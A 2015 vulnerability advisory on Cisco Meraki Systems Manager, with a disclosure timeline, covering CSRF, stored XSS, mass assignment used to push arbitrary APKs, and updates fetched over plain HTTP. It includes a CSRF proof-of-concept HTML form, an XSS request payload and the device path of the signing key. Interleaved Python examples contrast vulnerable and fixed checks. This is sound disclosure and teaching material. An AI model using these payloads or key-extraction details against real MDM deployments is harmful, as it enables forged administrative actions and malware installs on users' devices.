
Cisco Meraki Systems Manager CSRF / XSS / Functionality Abuse

Posted Jan 29, 2015
Authored by Denis Andzakovic | Site security-assessment.com

Cisco Meraki Systems Manager suffers from cross site request forgery, abuse of functionality, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
systems | cisco
SHA-256 | 9c34baf2089dd34e016937a33e17e5155490db6c285d7340f4b9688fcc63d496

(    , )     (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.

presents..

Cisco Meraki Systems Manager Multiple Vulnerabilities
Affected Versions: Cisco Meraki Systems Manager - Unknown Versions

PDF:
http://www.security-assessment.com/files/documents/advisory/Cisco_Meraki_Systems_Manager_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

The Cisco Meraki Systems Manager was found to suffer from a number of
vulnerabilities. A Cross Site Request Forgery vulnerability was discovered,
allowing an attacker to determine the registration code for an organisation's
Systems Manager instance or to send spam email from it. A Stored Cross Site
Scripting vulnerability was discovered, allowing a malicious end user running
the Systems Manager MDM software to stage Cross Site Scripting attacks against
the organisation's administrative users.

The Cisco Meraki Systems Manager administrative console was also found to
suffer from a Mass Assignment vulnerability, allowing a malicious user to
leverage the "Backpack" functionality to automatically download and install
arbitrary applications on end user devices. Additionally, updates for the
Systems Manager MDM software were found to be shipped over plain HTTP. This
allows an attacker to intercept and tamper with the application package,
provided they have access to the network path somewhere between the client
and the Meraki cloud.


+--------------+
| Exploitation |
+--------------+

--[ Cross Site Request Forgery

The Cisco Meraki Systems Manager administrative console uses an ‘X-CSRF-Token’
HTTP header to protect against Cross Site Request Forgery attacks. However, this
header is often not validated on the server side and can simply be omitted,
which is exactly what a cross-origin HTML form submission does, since a form
cannot set custom request headers. The following POC can be used to coerce an
authenticated administrator into sending an email containing arbitrary content
to an arbitrary address.

<html>
<body>
<!-- No X-CSRF-Token header is sent: a cross-origin form cannot add one, and
     the server accepts the request without it. The form has no method
     attribute, so it is submitted as the browser's default GET. -->
<form action="https://n85.meraki.com/Systems-Manager/n/Q6mExcvb/manage/configure/pcc_send_mdm_link/">
<input type="hidden" name="type" value="email" />
<input type="hidden" name="addr" value="ao367gnae9aer7ghb@mailinator.com" />
<input type="hidden" name="msg" value="Enroll in Meraki Systems Manager by opening this URL on your Android device:" />
<input type="hidden" name="platform" value="android" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

The CSRF POC above sends an invitation message to
‘ao367gnae9aer7ghb@mailinator.com’. Because the invitation is delivered to an
address the attacker controls, it may be leveraged to obtain an organisation's
registration code and stage further attacks against the Meraki deployment.
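The server-side flaw described above, as an added example in Python that is not code from the advisory or from Meraki (the advisory shows no server code): a CSRF check that only compares the X-CSRF-Token header when the client happens to send it, beside the corrected check that treats a missing header as a failure. The handler name, session store and form fields are assumptions shaped after the POC.

```python
import hmac
import secrets

# Constructed session store: session id -> CSRF token bound to that session.
SESSIONS = {"sess-admin": secrets.token_hex(16)}


def csrf_check_vulnerable(headers, session_id):
    """Mirrors the flaw: the X-CSRF-Token header is compared only when the
    client sends it, so a cross-site form post (which cannot set custom
    headers) is accepted without any token at all."""
    expected = SESSIONS[session_id]
    token = headers.get("X-CSRF-Token")
    if token is None:
        return True  # header omitted -> request silently accepted
    return hmac.compare_digest(token, expected)


def csrf_check_fixed(headers, session_id):
    """Hardened form: a state-changing request must carry a token that
    matches the one bound to the session; absence is a failure."""
    expected = SESSIONS.get(session_id)
    token = headers.get("X-CSRF-Token")
    if expected is None or token is None:
        return False
    return hmac.compare_digest(token, expected)


def handle_send_mdm_link(headers, session_id, form, check=csrf_check_fixed):
    """Hypothetical handler for the pcc_send_mdm_link endpoint. Returns the
    HTTP status it would answer with and the email it would queue; the
    email is only queued when the CSRF check passes."""
    if not check(headers, session_id):
        return 403, None
    return 200, {"to": form["addr"], "msg": form["msg"], "platform": form["platform"]}


# Constructed cross-site request: the browser attaches the victim's session
# cookie, but a plain HTML form post cannot add X-CSRF-Token.
CROSS_SITE_HEADERS = {"Cookie": "session=sess-admin"}
CROSS_SITE_FORM = {
    "type": "email",
    "addr": "attacker@example.invalid",
    "msg": "Enroll in Meraki Systems Manager by opening this URL on your Android device:",
    "platform": "android",
}

if __name__ == "__main__":
    print("vulnerable:", handle_send_mdm_link(CROSS_SITE_HEADERS, "sess-admin", CROSS_SITE_FORM, csrf_check_vulnerable))
    print("fixed:     ", handle_send_mdm_link(CROSS_SITE_HEADERS, "sess-admin", CROSS_SITE_FORM, csrf_check_fixed))
```

The vulnerable variant still rejects a wrong token, which is why the weakness is easy to miss in testing: a scanner that sends a bad token sees a 403 and concludes the protection works, while the omission case is never exercised.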

--[ Stored Cross Site Scripting

Systems Manager relies on a certificate on the mobile device (provisioned via
SCEP during registration) for authentication. A condition was discovered
wherein a malicious user can retrieve the relevant certificate and key from
the device and stage attacks against the Systems Manager administrative
console. This led to a Stored Cross Site Scripting vulnerability, where a
malicious user may send a crafted request to /android/callback with malicious
JavaScript code in the system_model parameter. The Mdm-Signature header is
then recreated by the malicious user and the payload sent. The Mdm-Signature
header can be generated by using a SpongyCastle content signer to sign the
POST parameter data with the recovered key.

The following request details the exploit. The system_model parameter is the
affected field; the remaining parameters have been shortened for brevity's
sake.

POST /android/callback HTTP/1.1
Mdm-Signature: <Recreated MDM Signature>
Content-Length: <content length>
Content-Type: application/x-www-form-urlencoded
Host: <Meraki Host>
Connection: Keep-Alive

{snip}&system_model=Galaxy+XSS+%3cscript%3ealert(%27Malicious+Javascript%27)%3c%2fscript%3e{snip}

The certificate and key used to create the Mdm-Signature header can be found
under /data/data/com.meraki.sm/files/ on a provisioned Android
device. The password for the keystore is under the ‘scep_keystore_password’
shared preference.

In order to exploit this, the attacker must be registered against the Meraki
MDM instance (in order to hold a valid device certificate). This requires
knowledge of a 10 digit enrollment code (xxx-xxx-xxxx), which must be brute
forced or obtained via other means (invitation email, QR code, etc.).

--[ Backpack Mass Assignment

The ‘Backpack’ functionality of the Cisco Meraki Systems Manager can be abused
to push arbitrary APK files to users’ devices. This is achieved by using mass
assignment to set the ‘auto_download’ and ‘auto_install’ flags on a specific
item (in this case an APK file) in the POST to
/System-Manager/n/<id>/manage/configure/update_pcc_ios. Further information is
available in the PDF version of this advisory.

It should be noted that the management policy popup on the device disables the
back button once the user is prompted to install the arbitrary APK, and the
Meraki Systems Manager application cannot be re-entered without tapping the
'install' button.
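The mass assignment pattern in the abstract, as an added example in Python that is not code from the advisory or from Meraki: an update handler that copies every submitted parameter onto the Backpack item record, so auto_download and auto_install can be set through a form that was only meant to edit descriptive fields, beside the allow-listed version. The item fields other than the two flags, and the update function names, are assumptions.

```python
import copy

# Constructed Backpack item, shaped after what the update form would edit.
ITEMS = {
    "apk-42": {
        "name": "Expenses.apk",
        "description": "Expense tracker for field staff",
        "auto_download": False,
        "auto_install": False,
    },
}

# Attributes the update form is meant to let an administrator change.
EDITABLE = {"name", "description"}


def fresh_store():
    """Deep copy of the constructed item store so each call starts clean."""
    return copy.deepcopy(ITEMS)


def as_flag(value):
    """Form values arrive as strings; map the usual truthy spellings to bool."""
    return str(value).strip().lower() in {"1", "true", "on", "yes"}


def update_pcc_item_vulnerable(store, item_id, params):
    """Mass assignment: every submitted parameter is written onto the record
    (with the framework-style type coercion a boolean column would get), so
    adding auto_download=1&auto_install=1 to the form flips the flags that
    push and install the APK on enrolled devices."""
    item = store[item_id]
    for key, value in params.items():
        item[key] = as_flag(value) if isinstance(item.get(key), bool) else value
    return item


def update_pcc_item_fixed(store, item_id, params):
    """Allow-list the writable attributes. Keys outside the list are not
    written and are returned so the caller can log the attempt."""
    item = store[item_id]
    rejected = sorted(set(params) - EDITABLE)
    for key in EDITABLE & set(params):
        item[key] = params[key]
    return item, rejected


# Constructed request body: the legitimate name edit plus the two extra
# parameters the advisory says mass assignment lets through.
MALICIOUS_PARAMS = {
    "name": "Expenses.apk",
    "auto_download": "1",
    "auto_install": "1",
}

if __name__ == "__main__":
    print(update_pcc_item_vulnerable(fresh_store(), "apk-42", MALICIOUS_PARAMS))
    print(update_pcc_item_fixed(fresh_store(), "apk-42", MALICIOUS_PARAMS))
```

The allow-list belongs in the handler for this specific form rather than on the model: the same item may legitimately have its flags changed from a different, more privileged screen, and a model-wide block would break that while a per-form list expresses exactly what each endpoint is for.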

--[ Updates over HTTP

An attacker with access to network traffic between the device and the Meraki
servers may tamper with the APK file used for updating. The update
notification specifies ‘http://dl.meraki.net/androidsm/AndroidSM.apk’ as the
document_url of the update, and when an update is available the application
requests the http://dl.meraki.com URL. Neither URL is protected by TLS, so
the package has no confidentiality or integrity protection in transit.
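A client-side acceptance check for an update notification, as an added example in Python that is not code from the advisory or from Meraki (the advisory does not say how Cisco addressed this finding): the update is rejected if document_url is not https, if the host is outside an expected set, or if the downloaded bytes do not match a digest announced in the notification. The sha256 field in the notification and the host allow-list are hypothetical; the advisory's notification carries only the URL.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed sample package and two notifications: the first is shaped like
# the one in the advisory, the second is a hypothetical hardened form that
# carries an https URL and the package's SHA-256.
PACKAGE = b"PK\x03\x04constructed-apk-bytes"
PACKAGE_SHA256 = hashlib.sha256(PACKAGE).hexdigest()
TAMPERED = PACKAGE + b"\x00injected"

ALLOWED_HOSTS = {"dl.meraki.net", "dl.meraki.com"}  # assumed allow-list

NOTIFICATION_HTTP = {"document_url": "http://dl.meraki.net/androidsm/AndroidSM.apk"}
NOTIFICATION_HARDENED = {
    "document_url": "https://dl.meraki.net/androidsm/AndroidSM.apk",
    "sha256": PACKAGE_SHA256,
}


def validate_update(notification, package_bytes):
    """Return 'ok' or a reason string. Rejects any update that would be
    fetched without TLS, from an unexpected host, or whose bytes do not
    match the digest announced in the notification."""
    url = urlsplit(notification.get("document_url", ""))
    if url.scheme != "https":
        return "rejected: document_url is not https"
    if url.hostname not in ALLOWED_HOSTS:
        return "rejected: unexpected host %r" % url.hostname
    expected = notification.get("sha256")
    if not expected:
        return "rejected: notification carries no package digest"
    actual = hashlib.sha256(package_bytes).hexdigest()
    if not hmac.compare_digest(actual, expected):
        return "rejected: package digest mismatch"
    return "ok"


if __name__ == "__main__":
    print(validate_update(NOTIFICATION_HTTP, PACKAGE))
    print(validate_update(NOTIFICATION_HARDENED, PACKAGE))
    print(validate_update(NOTIFICATION_HARDENED, TAMPERED))
```

A digest carried in the notification only helps if the notification itself arrives over an authenticated channel; otherwise the attacker who rewrites the APK also rewrites the digest. Verifying the APK's own signing certificate against the one already installed is the stronger control, since it does not depend on the transport at all.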

+----------+
| Solution |
+----------+

The Cisco Meraki Systems Manager cloud has been patched as deemed appropriate by Cisco.

+---------------------+
| Disclosure Timeline |
+---------------------+

13/10/2014 - Initial Advisory Sent to security@meraki.com
14/10/2014 - Response from Cisco acknowledging the advisory documents and
confirming the Updates over HTTP vulnerability.
14/10/2014 - Response from Cisco, in regard to the Mass Assignment
vulnerability, stating that "The ability to require the download and
installation of APK (and other files) is a feature of MDM Administration,
and does not on its own constitute a vulnerability." The remaining
vulnerabilities were acknowledged and more information was requested.
17/10/2014 - Additional information sent to Cisco, as requested.
30/10/2014 - Request for Update
30/10/2014 - Response stating the Cross Site Request Forgery and Cross Site
Scripting vulnerabilities were resolved
29/01/2015 - Advisory Release

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+

Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings,
contact us:

Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650



